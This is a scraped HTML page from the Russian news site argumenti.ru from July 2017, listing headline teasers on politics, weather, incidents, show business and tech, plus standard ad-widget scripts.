	<img src="http://argumenti.ru/images/preview/arhnews/d8d22f431713ebfd2d84562d6b7458f6.jpg" alt="Названа дата официального визита Путина в Финляндию" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/07/541101">Названа дата официального визита Путина в Финляндию</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/07/541101">Сегодня стало известно, когда состоится официальный визит президента России Владимира Путина в Финляндию. Согласно последней информации, поездка политика в страну запланирована на 27 июля.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a8360fd4ffd6e34ee4112e47aa0ebf93.jpg" alt="Путин лично обкатал правительственный лимузин отечественной сборки" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541099">Путин лично обкатал правительственный лимузин отечественной сборки</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541099">Владимир Путин готов пересесть с бронированного "Мерседеса" на представительский лимузин отечественной разработки. Более того, он уже обкатал новинку - правительственный лимузин проекта "Кортеж".

</a></div>		</div>
	</div>	



<div class="mainrub">
		<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>
	



	<img src="http://argumenti.ru/images/preview/arhnews/c8775e813e6fdc4734ec44cb0b5bf3fa.jpg" alt="В Пекине проходит массовая эвакуация из-за ливней" />
	
<p class="maxititle"><a href="http://argumenti.ru/world/2017/07/541128">В Пекине проходит массовая эвакуация из-за ливней</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/07/541128">В столице Китая Пекине проходит массовая эвакуация людей из-за сильнейших ливневых дождей, которые обрушились на город вчера. К настоящему моменту в безопасные места перевезли около 3,5 тысяч человек.</a></div>	</div>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/3bb3d01498b70da2577ac182b2608f46.jpg" alt="Пушков заявил о риске развязывания Трампом корейской войны" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/07/541059">Пушков заявил о риске развязывания Трампом корейской войны</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/07/541059">Сенатор Алексей Пушков заявил, что президент США Дональд Трамп может развязать корейскую войну, как его предшественники Джордж Буш и Барак Обама начали войну в Ливии и Ираке.

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a6335bb1f0679979f93f6d40ceb8d1a5.jpg" alt="Песков: вопрос участия Путина в выборах 2018 года пока не обсуждается" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/07/541103">Песков: вопрос участия Путина в выборах 2018 года пока не обсуждается</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/07/541103">Пресс-секретарь президента России Дмитрий Песков высказался сегодня об участии политика в выборах 2018 года. Он заявил, что обсуждение данного вопроса в настоящий момент не фигурирует в повестке дня.</a></div>		</div>
	</div>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/economics">Экономика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a5d4df37a355e15b80e98ff09f1abda4.jpg" alt="На чем приходится экономить россиянам" />
	

<p class="minititle"><a href="http://argumenti.ru/economics/2017/07/541117">На чем приходится экономить россиянам</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/economics/2017/07/541117">Россиянам приходится экономить на еде, особенно на деликатесах;  на путешествиях, на развлечениях, на ресторанах, на гаджетах. Социологи узнали, на чем особенно экономили жители России в 2016 году. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/hitech">Хайтек</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/762efc5009734f1507ca140d9d2610ed.jpg" alt="Group-IB предупреждает об атаке &laquo;невидимого&raquo; вируса-вымогателя на смартфоны" />
	

<p class="minititle"><a href="http://argumenti.ru/hitech/2017/07/541102">Group-IB предупреждает об атаке &laquo;невидимого&raquo; вируса-вымогателя на смартфоны</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/hitech/2017/07/541102">Ведущая международная компания Group-IB, специализирующаяся на предотвращении и расследовании преступлений с использованием высоких технологий, обнаружила распространение нового вируса.

</a></div>		</div>
	</div>
<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>
	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/39e0521e820e13f98ad972634512f012.jpg" alt="&quot;КосмоКурс&quot; будет строить свои ракеты, если не сможет договориться с Роскосмосом" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541076">&quot;КосмоКурс&quot; будет строить свои ракеты, если не сможет договориться с Роскосмосом</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541076">В скором времени "КосмоКурс" - оператор в области суборбитального туризма - может начать создавать свою ракетно-космическую технику. Это произойдет, если организация не сможет договориться с Роскосмосом.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/aeddd01bc2dee7ede3e288fab053a83b.jpg" alt="В Петербурге появится социальная очередь к мощам Николая Чудотворца" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541108">В Петербурге появится социальная очередь к мощам Николая Чудотворца</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541108">Вице-губернатор Санкт-Петербурга Александр Говорунов заявил, что к мощам Николая Чудотворца будет организована социальная очередь. Уточняется, что будет также основная очередь в Александро-Невскую лавру.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/b004035cb0732e430a299a57c7ace6be.jpg" alt="Гражданская супруга Олега Яковлева рассказала о его последних днях и завещании" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/07/541077">Гражданская супруга Олега Яковлева рассказала о его последних днях и завещании</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/07/541077">Прошло семь дней со дня безвременной смерти 47-летнего солиста группы «Иванушки Интернешнл» Олега Яковлева. Его гражданская супруга Александра Куцевол решила развеять все слухи относительно его диагноза. 

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/meteo">Метеоновости</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/88912c3254e924eb0954ffa7f93fe0b0.jpg" alt="7 июля станет самым холодным днем месяца" />
	

<p class="minititle"><a href="http://argumenti.ru/meteo/2017/07/541109">7 июля станет самым холодным днем месяца</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/meteo/2017/07/541109">Пятница, 7 июля, в Москве обещает стать самым холодным днем текущего месяца, полагают синоптики. Уже сегодняшней ночью температура резко пойдет на спад, достигнув +9°C. 

</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/hitech">Хайтек</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/4cb1df2187e8d4d3b19777dc69fa9fd3.jpg" alt="Новый сервис для малого бизнеса создали Яндекс.Деньги" />
	

<p class="minititle"><a href="http://argumenti.ru/hitech/2017/07/541133">Новый сервис для малого бизнеса создали Яндекс.Деньги</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/hitech/2017/07/541133">Яндекс.Деньги представили новый сервис. С его помощью можно организовать приём оплаты на сайте без технической интеграции. Сервис подойдёт небольшим компаниям, которые хотят попробовать оплату через интернет.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/hitech">Хайтек</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/51b4fc8f630f05e1882b356f2d643a76.jpeg" alt="Одноклассники интегрировали сервис объявлений Юла" />
	

<p class="minititle"><a href="http://argumenti.ru/hitech/2017/07/541131">Одноклассники интегрировали сервис объявлений Юла</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/hitech/2017/07/541131">Сервис бесплатных объявлений Юла стал доступен пользователям Одноклассников в новом разделе социальной сети. Объявление, размещенное в Одноклассниках, становится доступно на Юле и наоборот.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/cb94ee25098a129f676462c078e93eca.jpg" alt="Названы имена генералов МВД, ФСИН и МЧС, снятых 6 июля Путиным" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541129">Названы имена генералов МВД, ФСИН и МЧС, снятых 6 июля Путиным</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541129">Согласно указу президента РФ Владимира Путина, в МВД, ФСИН и МЧС произведены кадровые перестановки. От должностей освобождены:  первый замначальника ГУ на транспорте МВД генерал-майор полиции Андрей Андреев.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d0925215afd02024bb096ebaa0984305.jpg" alt="На МКАД обстреляли автомобиль и похитили из него сумку с деньгами" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/07/541126">На МКАД обстреляли автомобиль и похитили из него сумку с деньгами</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/07/541126">На Московской кольцевой автодороге неизвестные злоумышленники обстреляли иномарку и похитили из нее сумку с деньгами. Согласно последним данным, преступники украли из автомобиля 100 тысяч рублей.</a></div>		</div>
	</div>



	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/economics">Экономика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/f8e11c5712230906f9473e2145cc2482.jpg" alt="Минэкономразвития  назвало погоду основной причиной роста безработицы" />
	

<p class="minititle"><a href="http://argumenti.ru/economics/2017/07/541127">Минэкономразвития  назвало погоду основной причиной роста безработицы</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/economics/2017/07/541127">Погода никому в России в этом году не дает покоя. Минэкономразвития  назвало погоду основной причиной роста безработицы в мае. Холода повлияли на работу в сельском хозяйстве, туризме и ресторанном бизнесе.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/sport">Спорт</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/88d7f5c6a600dd0b2daa383fcea33e2a.jpg" alt="Трехмесячный ребенок стал самым юным болельщиком на Кубке конфедераций" />
	

<p class="minititle"><a href="http://argumenti.ru/sport/2017/07/541124">Трехмесячный ребенок стал самым юным болельщиком на Кубке конфедераций</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/sport/2017/07/541124">Самым юным болельщиком на Кубке конфедераций стал трехмесячный ребенок. Что касается самого возрастного человека, получившего паспорт болельщика, то им стал мужчина, которому больше 85 лет.</a></div>		</div>
	</div>




	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/b70fa7fb21feb590bc97eceecba17b18.jpg" alt="Шнуров и Киркоров поборются за пост президента" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/07/541125">Шнуров и Киркоров поборются за пост президента</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/07/541125">Лидер группировки "Ленинград" Сергей Шнуров и король российской эстрады Филипп Киркоров - просто нарасхват.  Шнуров и Киркоров - кандидаты на пост президента  рок-фестиваля "Нашествие".</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/75f3f930d0618d629b14a6eb162b6f92.jpg" alt="Паулина Андреева угощает Федора Бондарчука пиццей и газировкой" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/07/541122">Паулина Андреева угощает Федора Бондарчука пиццей и газировкой</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/07/541122">Роман режиссера Федора Бондарчука и актрисы Паулины Андреевой стремительно развивается. Недавно влюбленные устроили вечеринку для себя и друзей, гвоздем которой были пицца и газированные напитки.</a></div>		</div>
	</div>

	<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>


	<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14115">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14115/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/15bcf2ee0c3910446be992149f7b25b1.jpg" alt="Поклонская призвала не присылать  ей безобразные амплуа актера &quot;Матильды&quot;" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541121">Поклонская призвала не присылать  ей безобразные амплуа актера &quot;Матильды&quot;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541121">Депутат Госдумы, экс-прокурор Крыма Наталья Поклонская призвала не  присылать ей примеры актерских работ Ларса Айдингера, снявшегося в роли императора  Николая II в фильме Алексея Учителя "Матильда".
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/72483dbfc40cddf0325c002dd4dba630.png" alt="В Салехарде во дворе детского сада мужчина стрелял по мишеням из винтовки" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/07/541118">В Салехарде во дворе детского сада мужчина стрелял по мишеням из винтовки</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/07/541118">Житель Салехарда вчера устроил на территории детского сада стрельбу по мишеням из пневматической винтовки. После резонансного инцидента местные полицейские проводят тщательную проверку.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/816d8820fd5776689523914695ce4d76.png" alt="Чудо-асфальт укладывают в Омске" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541120">Чудо-асфальт укладывают в Омске</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541120">Омские дорожники готовятся удивить водителей в хорошем смысле слова. Они укладывают на городские трассы так называемый "самозалечивающийся" асфальт. И обещают, что ям на таком покрытии не будет как минимум 10 лет.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ad83045639cc0b07ae92d17738092c49.jpg" alt="Путин и Назарбаев поговорили о путях урегулирования кризиса в Сирии" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/07/541116">Путин и Назарбаев поговорили о путях урегулирования кризиса в Сирии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/07/541116">В четверг, 6 июля, президент России Владимир Путин и глава Казахстана Нурсултан Назарбаев поговорили по телефону. В рамках беседы политики обсудили тяжелую ситуацию в Сирии, а также пути урегулирования конфликта.</a></div>		</div>
	</div>




	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/culture">Культура</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/98e52c879819d86b60478b41a3744f25.jpg" alt="Фестиваль &laquo;Бродский Drive&raquo; будет радовать любителей джаза Петербурга целый месяц" />
	

<p class="minititle"><a href="http://argumenti.ru/culture/2017/07/541115">Фестиваль &laquo;Бродский Drive&raquo; будет радовать любителей джаза Петербурга целый месяц</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/culture/2017/07/541115">В период с 18 июня по 17 июля, каждые выходные, в саду Фонтанного дома (Музея Анны Ахматовой) на Литейном проспекте, 53, будут проходить концерты джазового фестиваля «Бродский Drive».</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/0ecfcc1fa604462ec0f03e511aba6944.jpg" alt="Каждый десятый выпускник российского вуза может не получить работу" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541114">Каждый десятый выпускник российского вуза может не получить работу</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541114">Аналитический центр при правительстве РФ предоставил доклад, в котором содержатся неутешительные данные. Оказывается, что каждый десятый выпускник российского вуза рискует не найти работу.</a></div>		</div>
	</div>



	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/87ba55a8f9db9dfc6aea26a09447d3e7.jpg" alt="Как будут выглядеть &quot;собянинки&quot;, власти Москвы показали на макетах" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541113">Как будут выглядеть &quot;собянинки&quot;, власти Москвы показали на макетах</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541113">Власти Москвы представили макеты новых столичных кварталов, которые появятся в рамках программы реновации. Все они выполнены в натуральную величину с соблюдением всех деталей отделки, вплоть до дверных ручек.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/culture">Культура</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/474868832d0e3818e4193785c46b5811.jpg" alt="Путин не посетит похороны писателя Даниила Гранина в Петербурге" />
	

<p class="minititle"><a href="http://argumenti.ru/culture/2017/07/541112">Путин не посетит похороны писателя Даниила Гранина в Петербурге</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/culture/2017/07/541112">Сегодня стало известно, что российский лидер Владимир Путин не приедет в Санкт-Петербург на похороны писателя Даниила Гранина. Об этом в четверг сообщил пресс-секретарь президента РФ Дмитрий Песков.</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/177b847696efaf47192ef2bb4e8ab2a5.jpg" alt="Концертному аферисту Лунькову дали три года колонии" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541111">Концертному аферисту Лунькову дали три года колонии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541111">Сегодня в Киевском районном суде Симферополя был вынесен приговор концертному аферисту Константину ЛУНЬКОВУ за мошенничество при продаже билетов на несостоявшийся концерт «Дискотека 80-х» на стадионе «Локомотив».</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/e9bc70513672e5270d45535c3b050b64.jpg" alt="Роснефть vs. АФК &laquo;Система&raquo; - это столкновение двух программ развития России" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541110">Роснефть vs. АФК &laquo;Система&raquo; - это столкновение двух программ развития России</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541110">Судебный процесс «Роснефти» против АФК «Система»  олигарха Владимира Евтушенкова за нефтяной актив в виде ООО «Башнефть» следует оценивать  как желание государства избавиться от наследия олигархической «семибанкирщины» 90-х. </a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/9bba1aee84ed6ddb4f5ffb94f842c404.jpg" alt="Мигранты заставляли похищенного бомжа заниматься попрошайничеством" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/07/541107">Мигранты заставляли похищенного бомжа заниматься попрошайничеством</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/07/541107">Питерская полиция задержала двух уроженцев Таджикистана, которых подозревают в похищении бездомного и принуждении его к попрошайничеству. Об этом в полицию заявил сам потерпевший, которому удалось бежать из «рабства».

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/573ae21cd9f8b59d99945d65905a5d22.jpg" alt="Джордж Клуни впервые появился с новорожденными детьми на публике" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/07/541105">Джордж Клуни впервые появился с новорожденными детьми на публике</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/07/541105">Джордж Клуни и его супруга Амаль впервые появились с новорожденными близнецами на публике. Папарацци смогли "подловить" семью актера в аэропорту Милана - муж, жена и дети выходили из частного самолета.</a></div>		</div>
	</div>	
		<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/meteo">Метеоновости</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d40ca0daf909c1df1ecea3ed44ffdd45.jpg" alt="Синоптики рассказали о сентябрьской прохладе и 30-градусной жаре этим летом" />
	

<p class="minititle"><a href="http://argumenti.ru/meteo/2017/07/541106">Синоптики рассказали о сентябрьской прохладе и 30-градусной жаре этим летом</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/meteo/2017/07/541106">Вся текущая неделя будет прохладной и дождливой. До субботы на Московскую область будет идти холодный воздух из северного циклона. Ближайшей ночью температура понизится до +9 градусов и больше будет напоминать сентябрь.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/e3ca6c31313feec45eb6636e28d2aeb4.jpg" alt="Владимир Путин освободил от должностей восемь генералов МВД, ФСИН и МЧС" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541104">Владимир Путин освободил от должностей восемь генералов МВД, ФСИН и МЧС</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541104">Глава России Владимир Путин в четверг, 6 июля, освободил от должностей восемь генералов. Согласно последней информации, изменения коснулись структур МВД, Федеральной службы исполнения наказаний и МЧС.</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d8d22f431713ebfd2d84562d6b7458f6.jpg" alt="Названа дата официального визита Путина в Финляндию" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/07/541101">Названа дата официального визита Путина в Финляндию</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/07/541101">Сегодня стало известно, когда состоится официальный визит президента России Владимира Путина в Финляндию. Согласно последней информации, поездка политика в страну запланирована на 27 июля.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a8360fd4ffd6e34ee4112e47aa0ebf93.jpg" alt="Путин лично обкатал правительственный лимузин отечественной сборки" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/07/541099">Путин лично обкатал правительственный лимузин отечественной сборки</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/07/541099">Владимир Путин готов пересесть с бронированного "Мерседеса" на представительский лимузин отечественной разработки. Более того, он уже обкатал новинку - правительственный лимузин проекта "Кортеж".

</a></div>		</div>
	</div>		</section>
	</div>

			<div style="margin-top: 8px;" class="right">

<div class="adv_corp">
		<div id="smi2adblock_45368"><a href="http://smi2.ru/" rel="nofollow">Новости СМИ2</a></div>
<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/45368.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>

</div>
		<script>
	$(document).ready(function(){
		$(".auth_but").click(function(){
		$(".a").toggle();
		$(".auth_but").toggle();
	});
});
</script>

	<h2 class="newsrub"><span class="rem">//</span>Авторы АН</h2>
	<div id="authors">
					<div class="author">
												<a href="http://argumenti.ru/authors/uglanov"><img src="http://argumenti.ru/images/authors/18919e6512ca050243ca6758f0d3ae40.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/uglanov">Андрей Угланов</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/society/n597/540980">Тень династии Романовых на православии</a></p>
			</div>
					<div class="author">
												<a href="http://argumenti.ru/authors/moskvina"><img src="http://argumenti.ru/images/authors/68b5a0cec33d5790ced5dbf530b53cda.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/moskvina">Татьяна Москвина</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/culture/n597/541000">Александр Петров: получится ли герой?</a></p>
			</div>
					<div class="author">
												<a href="http://argumenti.ru/authors/Krestiyaninov"><img src="http://argumenti.ru/images/authors/d82c89f68b4166b1aca801aef9299d80.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/Krestiyaninov">Виктор Крестьянинов</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/politics/n597/540982">&laquo;Большая двадцатка&raquo;: Москва и Берлин против Вашингтона</a></p>
			</div>
					<div class="author">
												<a href="http://argumenti.ru/authors/gurdin"><img src="http://argumenti.ru/images/authors/4c145198cfaa439093dc3fe9c702628e.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/gurdin">Константин Гурдин</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/economics/n597/540990">Световой меч правительства</a></p>
			</div>
						
	</div>	



	<div id="authors">

													<div class="a author">
																		<a href="http://argumenti.ru/authors/leonov"><img src="http://argumenti.ru/images/authors/713b23e010290cbe2897d9d2287532ac.jpg" alt="Владимир Леонов" /></a>
						<p class="auth_title"><a href="http://argumenti.ru/authors/leonov">Владимир Леонов</a></p>
						<p class="auth_anons"><a href="http://argumenti.ru/army/n597/541019">Океанской державе - океанские корабли</a></p>
					</div>
																		<div class="a author">
																		<a href="http://argumenti.ru/authors/tchuykov"><img src="http://argumenti.ru/images/authors/53a57ea5a54087725200bc171897e697.jpg" alt="Александр Чуйков" /></a>
						<p class="auth_title"><a href="http://argumenti.ru/authors/tchuykov">Александр Чуйков</a></p>
						<p class="auth_anons"><a href="http://argumenti.ru/gorodm/n596/540280">Голодный научный паёк</a></p>
					</div>
																		<div class="a author">
																		<a href="http://argumenti.ru/authors/ryazanov"><img src="http://argumenti.ru/images/authors/8941e3fe0828997c7877c9b05db1b2d2.jpg" alt="Сергей Рязанов" /></a>
						<p class="auth_title"><a href="http://argumenti.ru/authors/ryazanov">Сергей Рязанов</a></p>
						<p class="auth_anons"><a href="http://argumenti.ru/culture/n594/538719">&laquo;А на левой груди&nbsp;&ndash;  профиль Сталина&hellip;&raquo;</a></p>
					</div>
						
</div>
<p class="auth_but">Все авторы >></p>
<p class="auth_but" style="display:none;"><< Скрыть всех авторов</p>
		


		<h2 class="newsrub"><span class="rem">//</span><a href="http://argumenti.ru/culture/muzpodarok/">Музподарок от Юры Валова</a></h2>
	<ul class="minf_anons" style="background-color: #69C;">
	<li style="border: none;">
																<!--<a href="http://argumenti.ru/culture/2017/01/518064?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=" style="color: white;" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/2b9183819bc8c8eb6c1c57457f78dfbe.jpg" width="70" height="70" alt="Музподарок от Юрия Валова: Со всеми прошедшими и со Старым Новым Роком&hellip;" />-->
								<a href="http://argumenti.ru/culture/2017/01/518064?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=" style="color: white;" target="_self"><img src="http://www.argumenti.ru/pub/images/images_sl/valov.jpeg" width="70" height="70" alt="Музподарок от Юрия Валова: Со всеми прошедшими и со Старым Новым Роком&hellip;" />
